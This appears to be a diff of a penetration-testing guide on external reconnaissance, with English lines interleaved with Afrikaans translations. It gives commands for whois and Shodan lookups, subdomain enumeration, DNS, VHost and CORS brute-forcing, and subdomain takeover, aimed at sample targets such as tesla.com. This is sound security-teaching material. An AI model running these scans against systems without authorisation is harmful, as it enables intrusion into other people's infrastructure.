Inside a **whois** you can find a lot of interesting **information** like **organisation name**, **address**, **emails**, phone numbers... But which is even more interesting is that you can find **more assets related to the company** if you perform **reverse whois lookups by any of those fields** (for example other whois registries where the same email appears).\
You can use online tools like:
* [https://viewdns.info/reversewhois/](https://viewdns.info/reversewhois/) - **Gratis**
* [https://domaineye.com/reverse-whois](https://domaineye.com/reverse-whois) - **Gratis**
* [https://www.reversewhois.io/](https://www.reversewhois.io) - **Gratis**
* [https://www.whoxy.com/](https://www.whoxy.com) - **Gratis** web, nie gratis API nie.
* [http://reversewhois.domaintools.com/](http://reversewhois.domaintools.com) - Nie gratis nie
* [https://drs.whoisxmlapi.com/reverse-whois-search](https://drs.whoisxmlapi.com/reverse-whois-search) - Nie gratis (slegs **100 gratis** soektogte)
* [https://www.domainiq.com/](https://www.domainiq.com) - Nie gratis nie
* [https://viewdns.info/reversewhois/](https://viewdns.info/reversewhois/) - **Free**
* [https://domaineye.com/reverse-whois](https://domaineye.com/reverse-whois) - **Free**
* [https://www.reversewhois.io/](https://www.reversewhois.io) - **Free**
* [https://www.whoxy.com/](https://www.whoxy.com) - **Free** web, not free API.
* [http://reversewhois.domaintools.com/](http://reversewhois.domaintools.com) - Not free
* [https://drs.whoisxmlapi.com/reverse-whois-search](https://drs.whoisxmlapi.com/reverse-whois-search) - Not Free (only **100 free** searches)
* [https://www.domainiq.com/](https://www.domainiq.com) - Not Free
Jy kan hierdie taak outomatiseer deur [**DomLink** ](https://github.com/vysecurity/DomLink)(vereis 'n whoxy API-sleutel) te gebruik.\
Jy kan ook 'n paar outomatiese omgekeerde whois-ontdekkings doen met [amass](https://github.com/OWASP/Amass): `amass intel -d tesla.com -whois`
You can automate this task using [**DomLink** ](https://github.com/vysecurity/DomLink)(requires a whoxy API key).\
You can also perform some automatic reverse whois discovery with [amass](https://github.com/OWASP/Amass): `amass intel -d tesla.com -whois`
**Let daarop dat jy hierdie tegniek kan gebruik om meer domeinname te ontdek elke keer as jy 'n nuwe domein vind.**
**Note that you can use this technique to discover more domain names every time you find a new domain.**
### **Opvolgers**
### **Trackers**
As jy dieselfde ID van dieselfde opvolger op 2 verskillende bladsye vind, kan jy aanneem dat **beide bladsye** deur dieselfde span **bestuur word**.\
Byvoorbeeld, as jy dieselfde **Google Analytics ID** of dieselfde **Adsense ID** op verskeie bladsye sien.
If find the **same ID of the same tracker** in 2 different pages you can suppose that **both pages** are **managed by the same team**.\
For example, if you see the same **Google Analytics ID** or the same **Adsense ID** on several pages.
There are some pages and tools that let you search by these trackers and more:
Daar is 'n paar bladsye en hulpmiddels wat jou in staat stel om daardeur te soek en meer:
* [**Udon**](https://github.com/dhn/udon)
* [**BuiltWith**](https://builtwith.com)
@ -136,106 +130,92 @@ There are some pages and tools that let you search by these trackers and more:
### **Favicon**
Did you know that we can find related domains and sub domains to our target by looking for the same favicon icon hash? This is exactly what [favihash.py](https://github.com/m4ll0k/Bug-Bounty-Toolz/blob/master/favihash.py) tool made by [@m4ll0k2](https://twitter.com/m4ll0k2) does. Heres how to use it:
Het jy geweet dat ons verwante domeine en subdomeine aan ons teiken kan vind deur te soek na dieselfde favicon-ikoonhash? Dit is presies wat die [favihash.py](https://github.com/m4ll0k/Bug-Bounty-Toolz/blob/master/favihash.py) hulpmiddel, gemaak deur [@m4ll0k2](https://twitter.com/m4ll0k2), doen. Hier is hoe om dit te gebruik:
```bash
cat my_targets.txt | xargs -I %% bash -c 'echo "http://%%/favicon.ico"' > targets.txt
python3 favihash.py -f https://target/favicon.ico -t targets.txt -s
```
![favihash - ontdek domeine met dieselfde favicon-ikoon-hash](https://www.infosecmatter.com/wp-content/uploads/2020/07/favihash.jpg)
![favihash - discover domains with the same favicon icon hash](https://www.infosecmatter.com/wp-content/uploads/2020/07/favihash.jpg)
Simply said, favihash will allow us to discover domains that have the same favicon icon hash as our target.
Moreover, you can also search technologies using the favicon hash as explained in [**this blog post**](https://medium.com/@Asm0d3us/weaponizing-favicon-ico-for-bugbounties-osint-and-what-not-ace3c214e139). That means that if you know the **hash of the favicon of a vulnerable version of a web tech** you can search if in shodan and **find more vulnerable places**:
Eenvoudig gestel, favihash sal ons in staat stel om domeine te ontdek wat dieselfde favicon-ikoon-hash as ons teiken het.
Verder kan jy ook tegnologieë soek deur die favicon-hash te gebruik soos verduidelik in [**hierdie blogpos**](https://medium.com/@Asm0d3us/weaponizing-favicon-ico-for-bugbounties-osint-and-what-not-ace3c214e139). Dit beteken dat as jy die **hash van die favicon van 'n kwesbare weergawe van 'n webtegnologie** ken, kan jy soek of dit in shodan is en **meer kwesbare plekke vind**:
```bash
shodan search org:"Target" http.favicon.hash:116323821 --fields ip_str,port --separator " " | awk '{print $1":"$2}'
```
This is how you can **calculate the favicon hash** of a web:
Dit is hoe jy die **favicon-hash kan bereken** van 'n webwerf:
```python
import mmh3
import requests
import codecs
def fav_hash(url):
response = requests.get(url)
favicon = codecs.encode(response.content,"base64")
fhash = mmh3.hash(favicon)
print(f"{url} : {fhash}")
return fhash
response = requests.get(url)
favicon = codecs.encode(response.content,"base64")
fhash = mmh3.hash(favicon)
print(f"{url} : {fhash}")
return fhash
```
### **Auteursreg / Unieke string**
### **Copyright / Uniq string**
Soek binne die webbladsye na **strings wat gedeel kan word oor verskillende webwerwe in dieselfde organisasie**. Die **auteursreg string** kan 'n goeie voorbeeld wees. Soek dan vir daardie string in **Google**, in ander **blaaierprogramme** of selfs in **Shodan**: `shodan search http.html:"Auteursreg string"`
Search inside the web pages **strings that could be shared across different webs in the same organisation**. The **copyright string** could be a good example. Then search for that string in **google**, in other **browsers** or even in **shodan**: `shodan search http.html:"Copyright string"`
### **CRT Time**
It's common to have a cron job such as
### **CRT-tyd**
Dit is algemeen om 'n cron-taak te hê soos
```bash
# /etc/crontab
37 13 */10 * * certbot renew --post-hook "systemctl reload nginx"
```
### **Passiewe Oorname**
to renew the all the domain certificates on the server. This means that even if the CA used for this doesn't set the time it was generated in the Validity time, it's possible to **find domains belonging to the same company in the certificate transparency logs**.\
Check out this [**writeup for more information**](https://swarm.ptsecurity.com/discovering-domains-via-a-time-correlation-attack/).
Dit is blykbaar algemeen vir mense om subdomeine toe te ken aan IP-adresse wat aan wolkverskaffers behoort en op 'n stadium daardie IP-adres te verloor, maar vergeet om die DNS-rekord te verwyder. Daarom sal die skep van 'n VM in 'n wolk (soos Digital Ocean) jou eintlik die beheer oor sommige subdomeine gee.
### **Passive Takeover**
[**Hierdie berig**](https://kmsec.uk/blog/passive-takeover/) verduidelik 'n storie daaroor en stel 'n skripsie voor wat 'n VM in DigitalOcean skep, die IPv4 van die nuwe masjien kry, en in Virustotal soek na subdomeinrekords wat daarna verwys.
Apparently is common for people to assign subdomains to IPs that belongs to cloud providers and at some point **lose that IP address but forget about removing the DNS record**. Therefore, just **spawning a VM** in a cloud (like Digital Ocean) you will be actually **taking over some subdomains(s)**.
### **Ander maniere**
[**This post**](https://kmsec.uk/blog/passive-takeover/) explains a store about it and propose a script that **spawns a VM in DigitalOcean**, **gets** the **IPv4** of the new machine, and **searches in Virustotal for subdomain records** pointing to it.
### **Other ways**
**Note that you can use this technique to discover more domain names every time you find a new domain.**
**Let daarop dat jy hierdie tegniek kan gebruik om meer domeinname te ontdek elke keer as jy 'n nuwe domein vind.**
**Shodan**
As you already know the name of the organisation owning the IP space. You can search by that data in shodan using: `org:"Tesla, Inc."` Check the found hosts for new unexpected domains in the TLS certificate.
Aangesien jy reeds die naam van die organisasie wat die IP-ruimte besit, ken, kan jy daarna soek in Shodan deur die volgende te gebruik: `org:"Tesla, Inc."` Kyk na die gevonde gasheer vir nuwe onverwagte domeine in die TLS-sertifikaat.
You could access the **TLS certificate** of the main web page, obtain the **Organisation name** and then search for that name inside the **TLS certificates** of all the web pages known by **shodan** with the filter : `ssl:"Tesla Motors"` or use a tool like [**sslsearch**](https://github.com/HarshVaragiya/sslsearch).
Jy kan toegang verkry tot die **TLS-sertifikaat** van die hoofwebblad, die **Organisasienaam** verkry en dan soek na daardie naam binne die **TLS-sertifikate** van al die webbladsye wat bekend is by **Shodan** met die filter: `ssl:"Tesla Motors"` of gebruik 'n hulpmiddel soos [**sslsearch**](https://github.com/HarshVaragiya/sslsearch).
**Assetfinder**
[**Assetfinder** ](https://github.com/tomnomnom/assetfinder)is a tool that look for **domains related** with a main domain and **subdomains** of them, pretty amazing.
[**Assetfinder**](https://github.com/tomnomnom/assetfinder) is 'n hulpmiddel wat soek na **verwante domeine** van 'n hoofdomein en **subdomeine** daarvan, baie indrukwekkend.
### **Looking for vulnerabilities**
### **Soek na kwesbaarhede**
Check for some [domain takeover](../../pentesting-web/domain-subdomain-takeover.md#domain-takeover). Maybe some company is **using some a domain** but they **lost the ownership**. Just register it (if cheap enough) and let know the company.
Kyk vir 'n [domein-oorgawe](../../pentesting-web/domain-subdomain-takeover.md#domain-takeover). Dalk gebruik 'n maatskappy 'n domein, maar het hulle die eienaarskap verloor. Registreer dit net (as dit goedkoop genoeg is) en laat die maatskappy weet.
If you find any **domain with an IP different** from the ones you already found in the assets discovery, you should perform a **basic vulnerability scan** (using Nessus or OpenVAS) and some [**port scan**](../pentesting-network/#discovering-hosts-from-the-outside) with **nmap/masscan/shodan**. Depending on which services are running you can find in **this book some tricks to "attack" them**.\
_Note that sometimes the domain is hosted inside an IP that is not controlled by the client, so it's not in the scope, be careful._
As jy enige **domein met 'n ander IP** as diegene wat jy reeds in die bate-ontdekking gevind het, vind, moet jy 'n **basiese kwesbaarheidsskandering** (met behulp van Nessus of OpenVAS) en 'n [**poortskenning**](../pentesting-network/#discovering-hosts-from-the-outside) met **nmap/masscan/shodan** uitvoer. Afhangende van watter dienste besig is, kan jy in **hierdie boek 'n paar truuks vind om hulle te "aanval"**.\
Merk op dat die domein soms gehuisves word binne 'n IP wat nie deur die kliënt beheer word nie, so dit val buite die bestek, wees versigtig.
<img src="../../.gitbook/assets/i3.png" alt="" data-size="original">\
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
**Bug bounty wenk**: **Teken aan** vir **Intigriti**, 'n premium **bug bounty-platform wat deur hackers vir hackers geskep is**! Sluit vandag by ons aan by [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) en begin om belonings tot **$100,000** te verdien!
{% embed url="https://go.intigriti.com/hacktricks" %}
## Subdomains
## Subdomeine
> We know all the companies inside the scope, all the assets of each company and all the domains related to the companies.
> Ons ken al die maatskappye binne die bestek, al die bates van elke maatskappy en al die domeine wat verband hou met die maatskappye.
It's time to find all the possible subdomains of each found domain.
Dit is tyd om al die moontlike subdomeine van elke gevonde domein te vind.
### **DNS**
Let's try to get **subdomains** from the **DNS** records. We should also try for **Zone Transfer** (If vulnerable, you should report it).
Laten ons probeer om **subdomeine** uit die **DNS**-rekords te kry. Ons moet ook probeer vir **Zone Transfer** (As dit kwesbaar is, moet jy dit rapporteer).
```bash
dnsrecon -a -d tesla.com
```
### **OSINT**
The fastest way to obtain a lot of subdomains is search in external sources. The most used **tools** are the following ones (for better results configure the API keys):
Die vinnigste manier om 'n groot aantal subdomeine te verkry, is om in eksterne bronne te soek. Die mees gebruikte **hulpmiddels** is die volgende (stel die API-sleutels vir beter resultate):
* [**BBOT**](https://github.com/blacklanternsecurity/bbot)
```bash
# subdomains
bbot -t tesla.com -f subdomain-enum
@ -246,108 +226,80 @@ bbot -t tesla.com -f subdomain-enum -rf passive
# subdomains + port scan + web screenshots
bbot -t tesla.com -f subdomain-enum -m naabu gowitness -n my_scan -o .
```
* [**Amass**](https://github.com/OWASP/Amass)
```bash
amass enum [-active] [-ip] -d tesla.com
amass enum -d tesla.com | grep tesla.com # To just list subdomains
```
* [**subfinder**](https://github.com/projectdiscovery/subfinder)
```bash
# Subfinder, use -silent to only have subdomains in the output
./subfinder-linux-amd64 -d tesla.com [-silent]
```
* [**findomain**](https://github.com/Edu4rdSHL/findomain/)
```bash
# findomain, use -silent to only have subdomains in the output
./findomain-linux -t tesla.com [--quiet]
```
* [**OneForAll**](https://github.com/shmilylty/OneForAll/tree/master/docs/en-us)
* [**OneForAll**](https://github.com/shmilylty/OneForAll/tree/master/docs/af-za)
```bash
python3 oneforall.py --target tesla.com [--dns False] [--req False] [--brute False] run
```
* [**assetfinder**](https://github.com/tomnomnom/assetfinder)
```bash
assetfinder --subs-only <domain>
```
* [**Sudomy**](https://github.com/Screetsec/Sudomy)
```bash
# It requires that you create a sudomy.api file with API keys
sudomy -d tesla.com
```
* [**vita**](https://github.com/junnlikestea/vita)
```
vita -d tesla.com
```
* [**theHarvester**](https://github.com/laramies/theHarvester)
```bash
theHarvester -d tesla.com -b "anubis, baidu, bing, binaryedge, bingapi, bufferoverun, censys, certspotter, crtsh, dnsdumpster, duckduckgo, fullhunt, github-code, google, hackertarget, hunter, intelx, linkedin, linkedin_links, n45ht, omnisint, otx, pentesttools, projectdiscovery, qwant, rapiddns, rocketreach, securityTrails, spyse, sublist3r, threatcrowd, threatminer, trello, twitter, urlscan, virustotal, yahoo, zoomeye"
```
Daar is **ander interessante gereedskap/API's** wat, alhoewel nie direk gespesialiseer is in die vind van subdomeine nie, nuttig kan wees om subdomeine te vind, soos:
There are **other interesting tools/APIs** that even if not directly specialised in finding subdomains could be useful to find subdomains, like:
* [**Crobat**](https://github.com/cgboal/sonarsearch)**:** Uses the API [https://sonar.omnisint.io](https://sonar.omnisint.io) to obtain subdomains
* [**Crobat**](https://github.com/cgboal/sonarsearch)**:** Gebruik die API [https://sonar.omnisint.io](https://sonar.omnisint.io) om subdomeine te verkry.
```bash
# Get list of subdomains in output from the API
## This is the API the crobat tool will use
curl https://sonar.omnisint.io/subdomains/tesla.com | jq -r ".[]"
```
* [**JLDC free API**](https://jldc.me/anubis/subdomains/google.com)
* [**JLDC gratis API**](https://jldc.me/anubis/subdomains/google.com)
```bash
curl https://jldc.me/anubis/subdomains/tesla.com | jq -r ".[]"
```
* [**RapidDNS**](https://rapiddns.io) free API
* [**RapidDNS**](https://rapiddns.io) gratis API
```bash
# Get Domains from rapiddns free API
rapiddns(){
curl -s "https://rapiddns.io/subdomain/$1?full=1" \
| grep -oE "[\.a-zA-Z0-9-]+\.$1" \
| sort -u
curl -s "https://rapiddns.io/subdomain/$1?full=1" \
| grep -oE "[\.a-zA-Z0-9-]+\.$1" \
| sort -u
}
rapiddns tesla.com
```
* [**https://crt.sh/**](https://crt.sh)
```bash
# Get Domains from crt free API
crt(){
curl -s "https://crt.sh/?q=%25.$1" \
| grep -oE "[\.a-zA-Z0-9-]+\.$1" \
| sort -u
curl -s "https://crt.sh/?q=%25.$1" \
| grep -oE "[\.a-zA-Z0-9-]+\.$1" \
| sort -u
}
crt tesla.com
```
* [**gau**](https://github.com/lc/gau)**:** fetches known URLs from AlienVault's Open Threat Exchange, the Wayback Machine, and Common Crawl for any given domain.
* [**gau**](https://github.com/lc/gau)**:** haal bekende URL's op van AlienVault se Open Threat Exchange, die Wayback Machine, en Common Crawl vir enige gegewe domein.
```bash
# Get subdomains from GAUs found URLs
gau --subs tesla.com | cut -d "/" -f 3 | sort -u
```
* [**SubDomainizer**](https://github.com/nsonaniya2010/SubDomainizer) **&** [**subscraper**](https://github.com/Cillian-Collins/subscraper): They scrap the web looking for JS files and extract subdomains from there.
* [**SubDomainizer**](https://github.com/nsonaniya2010/SubDomainizer) **&** [**subscraper**](https://github.com/Cillian-Collins/subscraper): Hulle skraap die web op soek na JS-lêers en onttrek subdomeine daaruit.
```bash
# Get only subdomains from SubDomainizer
python3 SubDomainizer.py -u https://tesla.com | grep tesla.com
@ -355,42 +307,35 @@ python3 SubDomainizer.py -u https://tesla.com | grep tesla.com
# Get only subdomains from subscraper, this already perform recursion over the found results
python subscraper.py -u tesla.com | grep tesla.com | cut -d " " -f
```
* [**Shodan**](https://www.shodan.io/)
```bash
# Get info about the domain
shodan domain <domain>
# Get other pages with links to subdomains
shodan search "http.html:help.domain.com"
```
* [**Censys subdomain finder**](https://github.com/christophetd/censys-subdomain-finder)
* [**Censys subdomein vindprogram**](https://github.com/christophetd/censys-subdomain-finder)
```bash
export CENSYS_API_ID=...
export CENSYS_API_SECRET=...
python3 censys-subdomain-finder.py tesla.com
```
* [**DomainTrail.py**](https://github.com/gatete/DomainTrail)
```bash
python3 DomainTrail.py -d example.com
```
* [**securitytrails.com**](https://securitytrails.com/) has a free API to search for subdomains and IP history
* [**securitytrails.com**](https://securitytrails.com/) het 'n gratis API om na subdomeine en IP-geskiedenis te soek
* [**chaos.projectdiscovery.io**](https://chaos.projectdiscovery.io/#/)
This project offers for **free all the subdomains related to bug-bounty programs**. You can access this data also using [chaospy](https://github.com/dr-0x0x/chaospy) or even access the scope used by this project [https://github.com/projectdiscovery/chaos-public-program-list](https://github.com/projectdiscovery/chaos-public-program-list)
Hierdie projek bied **gratis alle subdomeine wat verband hou met fout-vondsprogramme**. Jy kan ook toegang tot hierdie data verkry deur [chaospy](https://github.com/dr-0x0x/chaospy) te gebruik of selfs toegang te verkry tot die omvang wat deur hierdie projek gebruik word [https://github.com/projectdiscovery/chaos-public-program-list](https://github.com/projectdiscovery/chaos-public-program-list)
You can find a **comparison** of many of these tools here: [https://blog.blacklanternsecurity.com/p/subdomain-enumeration-tool-face-off](https://blog.blacklanternsecurity.com/p/subdomain-enumeration-tool-face-off)
Jy kan 'n **vergelyking** van baie van hierdie gereedskap hier vind: [https://blog.blacklanternsecurity.com/p/subdomain-enumeration-tool-face-off](https://blog.blacklanternsecurity.com/p/subdomain-enumeration-tool-face-off)
### **DNS Brute force**
Let's try to find new **subdomains** brute-forcing DNS servers using possible subdomain names.
Laat ons probeer om nuwe **subdomeine** te vind deur DNS-bedieners te dwing met behulp van moontlike subdomeinname.
For this action you will need some **common subdomains wordlists like**:
Vir hierdie aksie sal jy 'n paar **gewone subdomeinwoordlyste soos** nodig hê:
* [https://gist.github.com/jhaddix/86a06c5dc309d08580a018c66354a056](https://gist.github.com/jhaddix/86a06c5dc309d08580a018c66354a056)
* [https://wordlists-cdn.assetnote.io/data/manual/best-dns-wordlist.txt](https://wordlists-cdn.assetnote.io/data/manual/best-dns-wordlist.txt)
@ -398,118 +343,93 @@ For this action you will need some **common subdomains wordlists like**:
* [https://github.com/pentester-io/commonspeak](https://github.com/pentester-io/commonspeak)
* [https://github.com/danielmiessler/SecLists/tree/master/Discovery/DNS](https://github.com/danielmiessler/SecLists/tree/master/Discovery/DNS)
And also IPs of good DNS resolvers. In order to generate a list of trusted DNS resolvers you can download the resolvers from [https://public-dns.info/nameservers-all.txt](https://public-dns.info/nameservers-all.txt) and use [**dnsvalidator**](https://github.com/vortexau/dnsvalidator) to filter them. Or you could use: [https://raw.githubusercontent.com/trickest/resolvers/main/resolvers-trusted.txt](https://raw.githubusercontent.com/trickest/resolvers/main/resolvers-trusted.txt)
En ook IP-adresse van goeie DNS-oplossers. Om 'n lys van vertroude DNS-oplossers te genereer, kan jy die oplossers aflaai vanaf [https://public-dns.info/nameservers-all.txt](https://public-dns.info/nameservers-all.txt) en [**dnsvalidator**](https://github.com/vortexau/dnsvalidator) gebruik om hulle te filtreer. Of jy kan gebruik maak van: [https://raw.githubusercontent.com/trickest/resolvers/main/resolvers-trusted.txt](https://raw.githubusercontent.com/trickest/resolvers/main/resolvers-trusted.txt)
The most recommended tools for DNS brute-force are:
* [**massdns**](https://github.com/blechschmidt/massdns): This was the first tool that performed an effective DNS brute-force. It's very fast however it's prone to false positives.
Die mees aanbevole gereedskap vir DNS-brute force is:
* [**massdns**](https://github.com/blechschmidt/massdns): Dit was die eerste gereedskap wat 'n doeltreffende DNS-brute force uitgevoer het. Dit is baie vinnig, maar dit is geneig om vals positiewe resultate te gee.
```bash
sed 's/$/.domain.com/' subdomains.txt > bf-subdomains.txt
./massdns -r resolvers.txt -w /tmp/results.txt bf-subdomains.txt
grep -E "tesla.com. [0-9]+ IN A .+" /tmp/results.txt
```
* [**gobuster**](https://github.com/OJ/gobuster): This one I think just uses 1 resolver
* [**gobuster**](https://github.com/OJ/gobuster): Ek dink hierdie een gebruik net 1 oplosser
```
gobuster dns -d mysite.com -t 50 -w subdomains.txt
```
* [**shuffledns**](https://github.com/projectdiscovery/shuffledns) is a wrapper around `massdns`, written in go, that allows you to enumerate valid subdomains using active bruteforce, as well as resolve subdomains with wildcard handling and easy input-output support.
* [**shuffledns**](https://github.com/projectdiscovery/shuffledns) is 'n omhulsel rondom `massdns`, geskryf in go, wat jou in staat stel om geldige subdomeine op te som deur middel van aktiewe bruteforce, asook om subdomeine op te los met wildcard hantering en maklike in-uitset ondersteuning.
```
shuffledns -d example.com -list example-subdomains.txt -r resolvers.txt
```
* [**puredns**](https://github.com/d3mondev/puredns): It also uses `massdns`.
* [**puredns**](https://github.com/d3mondev/puredns): Dit maak ook gebruik van `massdns`.
```
puredns bruteforce all.txt domain.com
```
* [**aiodnsbrute**](https://github.com/blark/aiodnsbrute) uses asyncio to brute force domain names asynchronously.
* [**aiodnsbrute**](https://github.com/blark/aiodnsbrute) gebruik asyncio om domeinname asinkronies te brute force.
```
aiodnsbrute -r resolvers -w wordlist.txt -vv -t 1024 domain.com
```
### Tweede DNS Brute-Force Ronde
### Second DNS Brute-Force Round
After having found subdomains using open sources and brute-forcing, you could generate alterations of the subdomains found to try to find even more. Several tools are useful for this purpose:
* [**dnsgen**](https://github.com/ProjectAnte/dnsgen)**:** Given the domains and subdomains generate permutations.
Nadat jy subdomeine gevind het deur gebruik te maak van oop bronne en brute-force, kan jy variasies van die gevonde subdomeine genereer om te probeer om selfs meer te vind. Verskeie hulpmiddels is nuttig vir hierdie doel:
* [**dnsgen**](https://github.com/ProjectAnte/dnsgen)**:** Gee die domeine en subdomeine en genereer permutasies.
```bash
cat subdomains.txt | dnsgen -
```
* [**goaltdns**](https://github.com/subfinder/goaltdns): Given the domains and subdomains generate permutations.
* You can get goaltdns permutations **wordlist** in [**here**](https://github.com/subfinder/goaltdns/blob/master/words.txt).
* [**goaltdns**](https://github.com/subfinder/goaltdns): Gee die domeine en subdomeine en genereer permutasies.
* Jy kan die goaltdns permutasies **woordelys** hier kry [**hier**](https://github.com/subfinder/goaltdns/blob/master/words.txt).
```bash
goaltdns -l subdomains.txt -w /tmp/words-permutations.txt -o /tmp/final-words-s3.txt
```
* [**gotator**](https://github.com/Josue87/gotator)**:** Given the domains and subdomains generate permutations. If not permutations file is indicated gotator will use its own one.
* [**gotator**](https://github.com/Josue87/gotator)**:** Gee die domeine en subdomeine en genereer permutasies. As geen permutasie lêer aangedui word nie, sal gotator sy eie een gebruik.
```
gotator -sub subdomains.txt -silent [-perm /tmp/words-permutations.txt]
```
* [**altdns**](https://github.com/infosec-au/altdns): Apart from generating subdomains permutations, it can also try to resolve them (but it's better to use the previous commented tools).
* You can get altdns permutations **wordlist** in [**here**](https://github.com/infosec-au/altdns/blob/master/words.txt).
* [**altdns**](https://github.com/infosec-au/altdns): Afgesien van die generering van subdomein-permutasies, kan dit ook probeer om hulle op te los (maar dit is beter om die vorige genoemde gereedskap te gebruik).
* Jy kan die altdns permutasies **woordelys** hier kry [**hier**](https://github.com/infosec-au/altdns/blob/master/words.txt).
```
altdns -i subdomains.txt -w /tmp/words-permutations.txt -o /tmp/asd3
```
* [**dmut**](https://github.com/bp0lr/dmut): Another tool to perform permutations, mutations and alteration of subdomains. This tool will brute force the result (it doesn't support dns wild card).
* You can get dmut permutations wordlist in [**here**](https://raw.githubusercontent.com/bp0lr/dmut/main/words.txt).
* [**dmut**](https://github.com/bp0lr/dmut): 'n Ander instrument om permutasies, mutasies en verandering van subdomeine uit te voer. Hierdie instrument sal die resultaat met geweld afdwing (dit ondersteun nie dns-wildkaart nie).
* Jy kan die dmut-permutasies-woordelys hier kry [**hier**](https://raw.githubusercontent.com/bp0lr/dmut/main/words.txt).
```bash
cat subdomains.txt | dmut -d /tmp/words-permutations.txt -w 100 \
--dns-errorLimit 10 --use-pb --verbose -s /tmp/resolvers-trusted.txt
--dns-errorLimit 10 --use-pb --verbose -s /tmp/resolvers-trusted.txt
```
* [**alterx**](https://github.com/projectdiscovery/alterx)**:** Gebaseer op 'n domein, **genereer dit nuwe potensiële subdomeinname** gebaseer op aangeduide patrone om meer subdomeine te ontdek.
* [**alterx**](https://github.com/projectdiscovery/alterx)**:** Based on a domain it **generates new potential subdomains names** based on indicated patterns to try to discover more subdomains.
#### Smart permutations generation
* [**regulator**](https://github.com/cramppet/regulator): For more info read this [**post**](https://cramppet.github.io/regulator/index.html) but it will basically get the **main parts** from the **discovered subdomains** and will mix them to find more subdomains.
#### Slim permutasie generasie
* [**regulator**](https://github.com/cramppet/regulator): Vir meer inligting lees hierdie [**pos**](https://cramppet.github.io/regulator/index.html), maar dit sal basies die **hoofdele** van die **ontdekte subdomeine** kry en meng om meer subdomeine te vind.
```bash
python3 main.py adobe.com adobe adobe.rules
make_brute_list.sh adobe.rules adobe.brute
puredns resolve adobe.brute --write adobe.valid
```
* [**subzuf**](https://github.com/elceef/subzuf)**:** _subzuf_ is a subdomain brute-force fuzzer coupled with an immensly simple but effective DNS reponse-guided algorithm. It utilizes a provided set of input data, like a tailored wordlist or historical DNS/TLS records, to accurately synthesize more corresponding domain names and expand them even further in a loop based on information gathered during DNS scan.
* [**subzuf**](https://github.com/elceef/subzuf)**:** _subzuf_ is 'n subdomein brute-force fuzzer wat gekoppel is aan 'n eenvoudige maar effektiewe DNS-respons-geleide algoritme. Dit maak gebruik van 'n voorsiene stel insetdata, soos 'n op maat gemaakte woordelys of historiese DNS/TLS-rekords, om akkuraat meer ooreenstemmende domeinname te sintetiseer en hulle verder uit te brei in 'n lus gebaseer op inligting wat tydens die DNS-scan ingesamel is.
```
echo www | subzuf facebook.com
```
### **Subdomein Ontdekkingswerkstroom**
### **Subdomain Discovery Workflow**
Check this blog post I wrote about how to **automate the subdomain discovery** from a domain using **Trickest workflows** so I don't need to launch manually a bunch of tools in my computer:
Kyk na hierdie blogpos wat ek geskryf het oor hoe om die ontdekking van subdomeine outomaties te maak deur gebruik te maak van Trickest-werkstrome sodat ek nie handmatig 'n klomp gereedskap op my rekenaar hoef te begin nie:
{% embed url="https://trickest.com/blog/full-subdomain-discovery-using-workflow/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
{% embed url="https://trickest.com/blog/full-subdomain-brute-force-discovery-using-workflow/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
### **VHosts / Virtual Hosts**
### **VHosts / Virtuele Gasheer**
If you found an IP address containing **one or several web pages** belonging to subdomains, you could try to **find other subdomains with webs in that IP** by looking in **OSINT sources** for domains in an IP or by **brute-forcing VHost domain names in that IP**.
As jy 'n IP-adres gevind het wat een of verskeie webbladsye bevat wat aan subdomeine behoort, kan jy probeer om ander subdomeine met webbladsye in daardie IP te vind deur in OSINT-bronne te kyk vir domeine in 'n IP of deur VHost-domeinname in daardie IP te brute force.
#### OSINT
You can find some **VHosts in IPs using** [**HostHunter**](https://github.com/SpiderLabs/HostHunter) **or other APIs**.
Jy kan sommige VHosts in IP's vind deur gebruik te maak van [HostHunter](https://github.com/SpiderLabs/HostHunter) of ander API's.
**Brute Force**
If you suspect that some subdomain can be hidden in a web server you could try to brute force it:
As jy vermoed dat 'n subdomein dalk weggesteek is op 'n webbediener, kan jy probeer om dit deur brute force te vind:
```bash
ffuf -c -w /path/to/wordlist -u http://victim.com -H "Host: FUZZ.victim.com"
@ -523,219 +443,211 @@ vhostbrute.py --url="example.com" --remoteip="10.1.1.15" --base="www.example.com
#https://github.com/codingo/VHostScan
VHostScan -t example.com
```
{% hint style="info" %}
With this technique you may even be able to access internal/hidden endpoints.
Met hierdie tegniek kan jy selfs toegang kry tot interne/verborge eindpunte.
{% endhint %}
### **CORS Brute Force**
Sometimes you will find pages that only return the header _**Access-Control-Allow-Origin**_ when a valid domain/subdomain is set in the _**Origin**_ header. In these scenarios, you can abuse this behaviour to **discover** new **subdomains**.
Soms sal jy bladsye vind wat slegs die _**Access-Control-Allow-Origin**_ kop _teruggee wanneer 'n geldige domein/subdomein in die _**Origin**_ kop ingestel is. In hierdie scenario's kan jy hierdie gedrag misbruik om nuwe **subdomeine** te **ontdek**.
```bash
ffuf -w subdomains-top1million-5000.txt -u http://10.10.10.208 -H 'Origin: http://FUZZ.crossfit.htb' -mr "Access-Control-Allow-Origin" -ignore-body
```
### **Emmers Brute Force**
### **Buckets Brute Force**
Terwyl jy soek na **subdomeine**, hou 'n oog uit om te sien of dit na enige soort **emmer** verwys, en in daardie geval [**kontroleer die toestemmings**](../../network-services-pentesting/pentesting-web/buckets/)**.**\
Verder, aangesien jy op hierdie punt al die domeine binne die omvang sal ken, probeer [**brute force moontlike emmernaam en kontroleer die toestemmings**](../../network-services-pentesting/pentesting-web/buckets/).
While looking for **subdomains** keep an eye to see if it is **pointing** to any type of **bucket**, and in that case [**check the permissions**](../../network-services-pentesting/pentesting-web/buckets/)**.**\
Also, as at this point you will know all the domains inside the scope, try to [**brute force possible bucket names and check the permissions**](../../network-services-pentesting/pentesting-web/buckets/).
### **Monitorisering**
### **Monitorization**
Jy kan **monitor** of **nuwe subdomeine** van 'n domein geskep word deur die **Sertifikaat Transparancy** Logboeke te monitor [**sublert** ](https://github.com/yassineaboukir/sublert/blob/master/sublert.py)doen.
You can **monitor** if **new subdomains** of a domain are created by monitoring the **Certificate Transparency** Logs [**sublert** ](https://github.com/yassineaboukir/sublert/blob/master/sublert.py)does.
### **Op soek na kwesbaarhede**
### **Looking for vulnerabilities**
